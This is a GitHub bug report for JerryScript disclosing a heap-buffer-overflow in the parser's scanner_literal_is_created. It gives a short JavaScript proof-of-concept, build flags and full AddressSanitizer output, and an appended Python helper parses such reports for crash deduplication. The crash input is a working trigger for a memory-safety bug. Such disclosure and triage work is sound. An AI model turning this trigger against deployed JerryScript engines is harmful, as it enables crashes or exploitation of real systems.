heap-buffer-overflow in scanner_literal_is_created #5073

Open
Ye0nny opened this issue Apr 19, 2023 · 0 comments

Ye0nny commented Apr 19, 2023

JerryScript revision

Commit: 05dbbd1
Version: v3.0.0

Build platform

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)

Build steps
python ./tools/build.py --clean --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
Test case
testcase

class s extends Uint32Array { static [ null ] ; [ null ] ; static [ null ] ; static set ( ) { } static { } ; } const n = new s ( t ) ; const t = BigInt ( ) ; assert ( n === Uint32Array ) ;

// poc.js
class s extends Uint32Array {  static { } ; } const n = new s ( ) ; const t = BigInt ( ) ;

Execution steps & Output
$ ./jerryscript/build/bin/jerry poc.js
=================================================================
==3080358==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf510068c at pc 0x566887dc bp 0xfff81e68 sp 0xfff81e58
READ of size 2 at 0xf510068c thread T0
    #0 0x566887db in scanner_literal_is_created ./jerryscript/jerry-core/parser/js/js-scanner-util.c:2922
    #1 0x566f8265 in parser_parse_var_statement ./jerryscript/jerry-core/parser/js/js-parser-statm.c:523
    #2 0x566fda21 in parser_parse_statements ./jerryscript/jerry-core/parser/js/js-parser-statm.c:3021
    #3 0x5667eb25 in parser_parse_source ./jerryscript/jerry-core/parser/js/js-parser.c:2280
    #4 0x566113cf in jerry_parse_common ./jerryscript/jerry-core/api/jerryscript.c:412
    #5 0x56611631 in jerry_parse ./jerryscript/jerry-core/api/jerryscript.c:480
    #6 0x56706644 in jerryx_source_parse_script ./jerryscript/jerry-ext/util/sources.c:52
    #7 0x56706701 in jerryx_source_exec_script ./jerryscript/jerry-ext/util/sources.c:63
    #8 0x56609d04 in main ./jerryscript/jerry-main/main-desktop.c:156
    #9 0xf7627ed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
    #10 0x5660cfb4 in _start (./jerryscript/build/bin/jerry+0x12fb4)

0xf510068c is located 4 bytes to the left of 8-byte region [0xf5100690,0xf5100698)
allocated by thread T0 here:
    #0 0xf7a10817 in __interceptor_malloc ../../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
    #1 0x5660cae4 in jmem_heap_alloc ./jerryscript/jerry-core/jmem/jmem-heap.c:254
    #2 0x56671d8d in jmem_heap_gc_and_alloc_block ./jerryscript/jerry-core/jmem/jmem-heap.c:291
    #3 0x566f25ab in parser_malloc ./jerryscript/jerry-core/parser/js/js-parser-mem.c:43
    #4 0x56686c95 in scanner_create_variables ./jerryscript/jerry-core/parser/js/js-scanner-util.c:2341
    #5 0x5667eae1 in parser_parse_source ./jerryscript/jerry-core/parser/js/js-parser.c:2277
    #6 0x566113cf in jerry_parse_common ./jerryscript/jerry-core/api/jerryscript.c:412
    #7 0x56611631 in jerry_parse ./jerryscript/jerry-core/api/jerryscript.c:480
    #8 0x56706644 in jerryx_source_parse_script ./jerryscript/jerry-ext/util/sources.c:52
    #9 0x56706701 in jerryx_source_exec_script ./jerryscript/jerry-ext/util/sources.c:63
    #10 0x56609d04 in main ./jerryscript/jerry-main/main-desktop.c:156
    #11 0xf7627ed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)

SUMMARY: AddressSanitizer: heap-buffer-overflow ./jerryscript/jerry-core/parser/js/js-scanner-util.c:2922 in scanner_literal_is_created
Shadow bytes around the buggy address:
  0x3ea20080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3ea20090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3ea200a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3ea200b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3ea200c0: fa fa fa fa fa fa 05 fa fa fa 05 fa fa fa fd fd
=>0x3ea200d0: fa[fa]00 fa fa fa 00 04 fa fa fd fd fa fa fd fd
  0x3ea200e0: fa fa fd fd fa fa 00 07 fa fa 00 06 fa fa 00 03
  0x3ea200f0: fa fa 00 07 fa fa 00 00 fa fa fa fa fa fa fa fa
  0x3ea20100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3ea20110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3ea20120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==3080358==ABORTING

With debugging mode (--debug)

Outputs
ICE: Assertion 'scope_stack_p > context_p->scope_stack_p' failed at ./jerryscript/jerry-core/parser/js/js-scanner-util.c(scanner_literal_is_created):2920.
Error: JERRY_FATAL_FAILED_ASSERTION
Aborted

Credits: @Ye0nny, @EJueon of the seclab-yonsei.
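An added triage helper (my code, not JerryScript's or the reporter's) that parses an ASan report like the one above into the fields a crash-deduplication pipeline keys on: bug class, access kind and size, the first in-project frame of the faulting stack, the allocation site, and the access offset relative to the allocated region (here 4 bytes before the start of an 8-byte region). The sample text is an excerpt of the report in this issue; the `jerry-core/` path marker is an assumption for what counts as an in-project frame, and skipping frames whose name contains "alloc" is a heuristic to step over allocator wrappers.

```python
# Added triage helper, not JerryScript code: pulls the dedup-relevant fields out
# of an AddressSanitizer report. SAMPLE_REPORT is excerpted from the issue above.
import re

SAMPLE_REPORT = """\
==3080358==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf510068c at pc 0x566887dc bp 0xfff81e68 sp 0xfff81e58
READ of size 2 at 0xf510068c thread T0
    #0 0x566887db in scanner_literal_is_created ./jerryscript/jerry-core/parser/js/js-scanner-util.c:2922
0xf510068c is located 4 bytes to the left of 8-byte region [0xf5100690,0xf5100698)
allocated by thread T0 here:
    #0 0xf7a10817 in __interceptor_malloc ../../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
    #1 0x5660cae4 in jmem_heap_alloc ./jerryscript/jerry-core/jmem/jmem-heap.c:254
    #4 0x56686c95 in scanner_create_variables ./jerryscript/jerry-core/parser/js/js-scanner-util.c:2341
"""

ERROR_RE = re.compile(r"==\d+==ERROR: AddressSanitizer: (?P<kind>[\w-]+) on address")
ACCESS_RE = re.compile(r"^(?P<op>READ|WRITE) of size (?P<size>\d+)", re.M)
FRAME_RE = re.compile(r"^\s*#\d+ 0x[0-9a-f]+ in (?P<func>\S+) (?P<file>\S+):(?P<line>\d+)\s*$", re.M)
REGION_RE = re.compile(r"is located (?P<dist>\d+) bytes to the (?P<side>left|right) of (?P<size>\d+)-byte region")

def first_project_frame(section, marker, skip=None):
    """First frame whose file path contains marker; frames whose function name
    contains skip (e.g. "alloc", a heuristic to step over allocator wrappers) are ignored."""
    for m in FRAME_RE.finditer(section):
        if marker in m.group("file") and (skip is None or skip not in m.group("func")):
            return f'{m.group("func")}:{m.group("line")}'
    return None

def parse_asan_report(text, project_marker="jerry-core/"):
    hdr, acc = ERROR_RE.search(text), ACCESS_RE.search(text)
    # The faulting-access stack ends where the allocation/free history begins.
    cut = re.search(r"^(allocated|freed) by thread", text, re.M)
    crash = first_project_frame(text[: cut.start()] if cut else text, project_marker)
    if not (hdr and acc and crash):
        raise ValueError("not an AddressSanitizer access report with an in-project frame")
    alloc = re.search(r"^allocated by thread", text, re.M)
    origin = first_project_frame(text[alloc.start():], project_marker, skip="alloc") if alloc else None
    reg = REGION_RE.search(text)
    offset = size = None
    if reg:  # offset of the access from the region start; negative means an underflow
        size, dist = int(reg.group("size")), int(reg.group("dist"))
        offset = -dist if reg.group("side") == "left" else size + dist
    return {"bug": hdr.group("kind"), "access": f'{acc.group("op")}{acc.group("size")}',
            "crash": crash, "alloc": origin, "region_offset": offset, "region_size": size}

def dedup_key(report):
    """Stable bucket id: same bug class, access and crashing source line => same bucket."""
    return f'{report["bug"]}|{report["access"]}|{report["crash"]}'
```

Running `parse_asan_report(SAMPLE_REPORT)` on the excerpt yields a negative `region_offset`, which is the quick signal that this is an underflow below the region's start rather than an overrun past its end.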
